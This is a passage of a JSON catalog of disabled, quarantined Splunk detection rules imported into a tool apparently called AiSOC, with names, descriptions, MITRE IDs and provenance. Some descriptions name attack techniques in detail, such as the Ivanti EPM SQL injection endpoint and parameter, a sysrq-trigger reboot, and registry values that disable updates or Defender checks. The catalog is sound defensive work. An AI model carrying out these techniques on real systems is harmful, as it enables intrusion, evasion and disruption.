If confirmed malicious, this activity could allow attackers to map network connections, aiding in lateral movement or further exploitation within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1049" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getnettcpconnection-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e02af35c-1de5-4afe-b4be-f45aba57272b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getnettcpconnection_with_powershell.yml" } }, { "id": "splunk-security-content-e03edeba-4942-470c-a664-27253f3ad351", "type": "detection", "name": "Ivanti EPMM Remote Unauthenticated API Access CVE-2023-35082", "description": "The following analytic detects potential unauthorized access attempts exploiting CVE-2023-35082 within Ivanti's software products.\nIt identifies access to the specific URI path /mifs/asfV3/api/v2/ with an HTTP 200 response code in web access logs, indicating successful unauthorized access.\nThis activity is significant for a SOC as it highlights potential security breaches that could lead to unauthorized data access or system modifications.\nIf confirmed malicious, an attacker could gain unbridled access to sensitive organizational data or modify systems maliciously, posing severe security risks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1133" ], "log_source": null, "playbook": null, 
"verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ivanti-epmm-remote-unauthenticated-api-access-cve-2023-35082.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e03edeba-4942-470c-a664-27253f3ad351", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/ivanti_epmm_remote_unauthenticated_api_access_cve_2023_35082.yml" } }, { "id": "splunk-security-content-e0422b71-2c05-4f32-8754-01fb415f49c9", "type": "detection", "name": "Executables Or Script Creation In Temp Path", "description": "The following analytic identifies the creation of executables or scripts in temporary file paths on Windows systems. It leverages the Endpoint.Filesystem data set to detect files with specific extensions (e.g., .exe, .dll, .ps1) created in temporary directories (e.g., \\windows\\Temp\\, \\AppData\\Local\\Temp\\).\nThis activity can be significant as adversaries often use these paths to evade detection and maintain persistence.\nIf confirmed malicious, this behavior could allow attackers to execute unauthorized code, escalate privileges, or persist within the environment, posing a significant security threat.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/executables-or-script-creation-in-temp-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"splunk/security_content", "source_id": "e0422b71-2c05-4f32-8754-01fb415f49c9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/executables_or_script_creation_in_temp_path.yml" } }, { "id": "splunk-security-content-e0428212-61b7-11ec-88a3-acde48001122", "type": "detection", "name": "Linux Service Started Or Enabled", "description": "The following analytic detects the creation or enabling of services on Linux platforms using the systemctl or service tools. It leverages Endpoint Detection and Response (EDR) logs, focusing on process names, parent processes, and command-line executions. This activity is significant as adversaries may create or modify services to maintain persistence or execute malicious payloads. If confirmed malicious, this behavior could lead to persistent access, data theft, ransomware deployment, or other damaging outcomes. 
Monitoring and investigating such activities are crucial for maintaining the security and integrity of the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-service-started-or-enabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e0428212-61b7-11ec-88a3-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_service_started_or_enabled.yml" } }, { "id": "splunk-security-content-e08620cb-9488-4052-832d-97bcc0afd414", "type": "detection", "name": "Windows Admin Permission Discovery", "description": "The following analytic identifies the creation of a suspicious file named 'win.dat' in the root directory (C:\\). It leverages data from the Endpoint.Filesystem datamodel to detect this activity. This behavior is significant as it is commonly used by malware like NjRAT to check for administrative privileges on a compromised host. 
If confirmed malicious, this activity could indicate that the malware has administrative access, allowing it to perform high-privilege actions, potentially leading to further system compromise and persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-admin-permission-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e08620cb-9488-4052-832d-97bcc0afd414", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_admin_permission_discovery.yml" } }, { "id": "splunk-security-content-e0940505-0b73-4719-84e6-cb94c44a5245", "type": "detection", "name": "Linux Indicator Removal Clear Cache", "description": "The following analytic detects processes that clear or free page cache on a Linux system. It leverages Endpoint Detection and Response (EDR) data, focusing on specific command-line executions involving the kernel system request `drop_caches`. This activity is significant as it may indicate an attempt to delete forensic evidence or the presence of wiper malware like Awfulshred. 
If confirmed malicious, this behavior could allow an attacker to cover their tracks, making it difficult to investigate other malicious activities or system compromises.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-indicator-removal-clear-cache.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e0940505-0b73-4719-84e6-cb94c44a5245", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_indicator_removal_clear_cache.yml" } }, { "id": "splunk-security-content-e09c598e-8dd0-4e73-b740-4b96b689199e", "type": "detection", "name": "Windows Modify Registry Do Not Connect To Win Update", "description": "The following analytic detects a suspicious modification to the Windows registry that disables automatic updates. It leverages data from the Endpoint datamodel, specifically monitoring changes to the registry path \"*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\WindowsUpdate\\\\DoNotConnectToWindowsUpdateInternetLocations\" with a value of \"0x00000001\". This activity is significant as it can be used by adversaries, including malware like RedLine Stealer, to evade detection and prevent the system from receiving critical updates. 
If confirmed malicious, this could allow attackers to exploit vulnerabilities, persist in the environment, and potentially deploy additional payloads.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-do-not-connect-to-win-update.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e09c598e-8dd0-4e73-b740-4b96b689199e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_do_not_connect_to_win_update.yml" } }, { "id": "splunk-security-content-e0aad4cf-0790-423b-8328-7564d0d938f9", "type": "detection", "name": "SQL Injection with Long URLs", "description": "The following analytic detects long URLs containing multiple SQL commands, indicating a potential SQL injection attack. This detection leverages web traffic data, specifically targeting web server destinations with URLs longer than 1024 characters or HTTP user agents longer than 200 characters. SQL injection is significant as it allows attackers to manipulate a web application's database, potentially leading to unauthorized data access or modification. If confirmed malicious, this activity could result in data breaches, unauthorized access, and complete system compromise. 
Immediate investigation and validation of alerts are crucial to mitigate these risks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/sql-injection-with-long-urls.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e0aad4cf-0790-423b-8328-7564d0d938f9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/sql_injection_with_long_urls.yml" } }, { "id": "splunk-security-content-e0b6ca60-9e29-4450-b51a-bba0abae2313", "type": "detection", "name": "Windows Impair Defense Deny Security Software With Applocker", "description": "The following analytic detects modifications in the Windows registry by the Applocker utility that deny the execution of various security products. This detection leverages data from the Endpoint.Registry datamodel, focusing on specific registry paths and values indicating a \"Deny\" action against known antivirus and security software. This activity is significant as it may indicate an attempt to disable security defenses, a tactic observed in malware like Azorult. 
If confirmed malicious, this could allow attackers to bypass security measures, facilitating further malicious activities and persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-deny-security-software-with-applocker.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e0b6ca60-9e29-4450-b51a-bba0abae2313", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_deny_security_software_with_applocker.yml" } }, { "id": "splunk-security-content-e0be2c83-5526-4219-a14f-c3db2e763d15", "type": "detection", "name": "Okta IDP Lifecycle Modifications", "description": "The following analytic identifies modifications to Okta Identity Provider (IDP) lifecycle events, including creation, activation, deactivation, and deletion of IDP configurations. It uses OktaIm2 logs ingested via the Splunk Add-on for Okta Identity Cloud. Monitoring these events is crucial for maintaining the integrity and security of authentication mechanisms. Unauthorized or anomalous changes could indicate potential security breaches or misconfigurations. 
If confirmed malicious, attackers could manipulate authentication processes, potentially gaining unauthorized access or disrupting identity management systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/okta-idp-lifecycle-modifications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e0be2c83-5526-4219-a14f-c3db2e763d15", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/okta_idp_lifecycle_modifications.yml" } }, { "id": "splunk-security-content-e0eea4fa-4274-11ec-882b-3e22fbd008af", "type": "detection", "name": "Windows Service Creation on Remote Endpoint", "description": "The following analytic identifies the creation of a Windows Service on a remote endpoint using `sc.exe`. It detects this activity by analyzing process execution logs from Endpoint Detection and Response (EDR) agents, focusing on command-line arguments that include remote paths and service creation commands. This behavior is significant because adversaries often exploit the Service Control Manager for lateral movement and remote code execution. 
If confirmed malicious, this activity could allow attackers to execute arbitrary code on remote systems, potentially leading to further compromise and persistence within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-service-creation-on-remote-endpoint.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e0eea4fa-4274-11ec-882b-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_service_creation_on_remote_endpoint.yml" } }, { "id": "splunk-security-content-e11c3d90-5bc7-42ad-94cd-ba75db10d897", "type": "detection", "name": "Windows Defacement Modify Transcodedwallpaper File", "description": "The following analytic identifies modifications to the TranscodedWallpaper file in the wallpaper theme directory, excluding changes made by explorer.exe. This detection leverages the Endpoint.Processes and Endpoint.Filesystem data models to correlate process activity with file modifications. This activity is significant as it may indicate an adversary attempting to deface or change the desktop wallpaper of a targeted host, a tactic often used to signal compromise or deliver a message. 
If confirmed malicious, this could be a sign of unauthorized access and tampering, potentially leading to further system compromise or data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1491" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-defacement-modify-transcodedwallpaper-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e11c3d90-5bc7-42ad-94cd-ba75db10d897", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_defacement_modify_transcodedwallpaper_file.yml" } }, { "id": "splunk-security-content-e13ceade-b673-4d34-adc4-4d9c01729753", "type": "detection", "name": "Windows Mshta Execution In Registry", "description": "The following analytic detects the execution of mshta.exe via registry entries to run malicious scripts. It leverages registry activity logs to identify entries containing \"mshta,\" \"javascript,\" \"vbscript,\" or \"WScript.Shell.\" This behavior is significant as it indicates potential fileless malware, such as Kovter, which uses encoded scripts in the registry to persist and execute without files. 
If confirmed malicious, this activity could allow attackers to maintain persistence, execute arbitrary code, and evade traditional file-based detection methods, posing a significant threat to system integrity and security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-mshta-execution-in-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e13ceade-b673-4d34-adc4-4d9c01729753", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_mshta_execution_in_registry.yml" } }, { "id": "splunk-security-content-e14d94a3-07fb-4b47-8406-f5e37180d422", "type": "detection", "name": "Windows Debugger Tool Execution", "description": "This analysis detects the use of debugger tools within a production environment. While these tools are legitimate for file analysis and debugging, they are abused by malware like PlugX and DarkGate for malicious DLL side-loading. 
The hunting query aids Security Operations Centers (SOCs) in identifying potentially suspicious tool executions, particularly for non-technical users in the production network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-debugger-tool-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e14d94a3-07fb-4b47-8406-f5e37180d422", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_debugger_tool_execution.yml" } }, { "id": "splunk-security-content-e155876a-6048-11eb-ae93-0242ac130002", "type": "detection", "name": "O365 New Federated Domain Added", "description": "The following analytic identifies the addition of a new federated domain in an Office 365 environment. This behavior is detected by analyzing Office 365 management activity logs, specifically filtering for Workload=Exchange and Operation=\"Add-FederatedDomain\". The addition of a new federated domain is significant as it may indicate unauthorized changes or potential compromises. If confirmed malicious, attackers could establish a backdoor, bypass security measures, or exfiltrate data, leading to data breaches and unauthorized access to sensitive information. 
Immediate investigation is required to review the details of the added domain and any concurrent suspicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-new-federated-domain-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e155876a-6048-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_new_federated_domain_added.yml" } }, { "id": "splunk-security-content-e1866ce2-ca22-11eb-8e44-acde48001122", "type": "detection", "name": "PowerShell Domain Enumeration", "description": "The following analytic detects the execution of PowerShell commands used for domain enumeration, such as `get-netdomaintrust` and `get-adgroupmember`. It leverages PowerShell Script Block Logging (EventCode=4104) to capture and analyze the full command sent to PowerShell. This activity is significant as it often indicates reconnaissance efforts by an attacker to map out the domain structure and identify key users and groups. 
If confirmed malicious, this behavior could lead to further targeted attacks, privilege escalation, and unauthorized access to sensitive information within the domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-domain-enumeration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e1866ce2-ca22-11eb-8e44-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_domain_enumeration.yml" } }, { "id": "splunk-security-content-e1912b58-ed9c-422c-bbb0-2dbc70398345", "type": "detection", "name": "Linux System Reboot Via System Request Key", "description": "The following analytic detects the execution of the SysReq hack to reboot a Linux system host. It leverages Endpoint Detection and Response (EDR) data to identify processes executing the command to pipe 'b' to /proc/sysrq-trigger. This activity is significant as it is an uncommon method to reboot a system and was observed in the Awfulshred malware wiper. 
If confirmed malicious, this technique could indicate the presence of suspicious processes and potential system compromise, leading to unauthorized reboots and disruption of services.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1529" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-system-reboot-via-system-request-key.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e1912b58-ed9c-422c-bbb0-2dbc70398345", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_system_reboot_via_system_request_key.yml" } }, { "id": "splunk-security-content-e1997b2e-655f-4561-82fd-aeba8e1c1a86", "type": "detection", "name": "Suspicious SQLite3 LSQuarantine Behavior", "description": "The following analytic identifies the use of SQLite3 querying the MacOS preferences to determine the original URL from which a package was downloaded. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions involving LSQuarantine. This activity is significant as it is commonly associated with MacOS adware and other malicious software. 
If confirmed malicious, this behavior could indicate an attempt to track or manipulate downloaded packages, potentially leading to further system compromise or persistent adware infections.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1074" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-sqlite3-lsquarantine-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e1997b2e-655f-4561-82fd-aeba8e1c1a86", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_sqlite3_lsquarantine_behavior.yml" } }, { "id": "splunk-security-content-e1c6dec5-2249-442d-a1f9-99a4bd228183", "type": "detection", "name": "Linux c99 Privilege Escalation", "description": "The following analytic detects the execution of the c99 utility with sudo privileges, which can lead to privilege escalation on Linux systems. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include command-line details. This activity is significant because it indicates a potential misuse of the c99 utility to gain root access, which is critical for maintaining system security. 
If confirmed malicious, this could allow an attacker to execute commands as root, potentially compromising the entire system and accessing sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-c99-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e1c6dec5-2249-442d-a1f9-99a4bd228183", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_c99_privilege_escalation.yml" } }, { "id": "splunk-security-content-e1d5145f-38fe-42b9-a5d5-457796715f97", "type": "detection", "name": "Windows Execute Arbitrary Commands with MSDT", "description": "The following analytic detects arbitrary command execution using Windows msdt.exe, a Diagnostics Troubleshooting Wizard. It leverages Endpoint Detection and Response (EDR) data to identify instances where msdt.exe is invoked via the ms-msdt:/ protocol handler to retrieve a remote payload. This activity is significant as it can indicate an exploitation attempt leveraging msdt.exe to execute arbitrary commands, potentially leading to unauthorized code execution. 
If confirmed malicious, this could allow an attacker to execute arbitrary code, escalate privileges, or persist within the environment, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-execute-arbitrary-commands-with-msdt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e1d5145f-38fe-42b9-a5d5-457796715f97", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_execute_arbitrary_commands_with_msdt.yml" } }, { "id": "splunk-security-content-e20313d2-7d63-4fcf-b2d9-d6e12c6c7bd7", "type": "detection", "name": "Cisco Secure Firewall - Rare Snort Rule Triggered", "description": "This analytic identifies Snort signatures that have triggered only once in the past 7 days across all Cisco Secure Firewall IntrusionEvent logs. While these rules typically do not trigger in day-to-day network activity, their sudden appearance may indicate early-stage compromise, previously unseen malware, or reconnaissance activity against less commonly exposed services. 
Investigating these outliers can provide valuable insight into new or low-noise adversary behaviors.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1598", "T1583.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-rare-snort-rule-triggered.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e20313d2-7d63-4fcf-b2d9-d6e12c6c7bd7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___rare_snort_rule_triggered.yml" } }, { "id": "splunk-security-content-e20564ca-c86c-4e30-acdb-a8486673426f", "type": "detection", "name": "Ivanti EPM SQL Injection Remote Code Execution", "description": "This detection identifies potential exploitation of a critical SQL injection vulnerability in Ivanti Endpoint Manager (EPM), identified as CVE-2024-29824.\nThe vulnerability, which has a CVSS score of 9.8, allows for remote code execution through the `RecordGoodApp` function in the `PatchBiz.dll` file.\nAn attacker can exploit this vulnerability by manipulating the `goodApp.md5` value in an HTTP POST request to the `/WSStatusEvents/EventHandler.asmx` endpoint, leading to unauthorized command execution on the server.\nMonitoring for unusual SQL commands and HTTP requests to this endpoint can help identify exploitation attempts.\nNote that the detection focuses on the URI path, the HTTP method, and an HTTP status code of 200, indicating potential exploitation.\nTo properly identify if this was successful, TLS inspection and additional network 
traffic analysis is required as the xp_cmdshell comes in via the request body.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ivanti-epm-sql-injection-remote-code-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e20564ca-c86c-4e30-acdb-a8486673426f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/ivanti_epm_sql_injection_remote_code_execution.yml" } }, { "id": "splunk-security-content-e234970c-dcf5-4f80-b6a9-3a562544ca5b", "type": "detection", "name": "Windows Impair Defense Disable Web Evaluation", "description": "The following analytic detects modifications to the Windows registry entry \"EnableWebContentEvaluation\" to disable Windows Defender web content evaluation. It leverages data from the Endpoint.Registry datamodel, specifically monitoring changes where the registry value is set to \"0x00000000\". This activity is significant as it indicates an attempt to impair browser security features, potentially allowing malicious web content to bypass security checks. 
If confirmed malicious, this could lead to users interacting with harmful scripts or unsafe web elements, increasing the risk of system exploitation and security breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-disable-web-evaluation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e234970c-dcf5-4f80-b6a9-3a562544ca5b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_disable_web_evaluation.yml" } }, { "id": "splunk-security-content-e24f0a0e-41a9-419f-9999-eacab15efc36", "type": "detection", "name": "Windows System Network Config Discovery Display DNS", "description": "The following analytic identifies the execution of the \"ipconfig /displaydns\" command, which retrieves DNS reply information using the built-in Windows tool IPConfig. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process command-line executions. Monitoring this activity is significant as threat actors and post-exploitation tools like WINPEAS often abuse this command to gather network information. 
If confirmed malicious, this activity could allow attackers to map the network, identify DNS servers, and potentially facilitate further network-based attacks or lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1016" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-system-network-config-discovery-display-dns.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "e24f0a0e-41a9-419f-9999-eacab15efc36", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_system_network_config_discovery_display_dns.yml" } }, { "id": "splunk-security-content-e2549f2c-0aef-408a-b0c1-e0f270623436", "type": "detection", "name": "Windows Ngrok Reverse Proxy Usage", "description": "The following analytic detects the execution of ngrok.exe on a 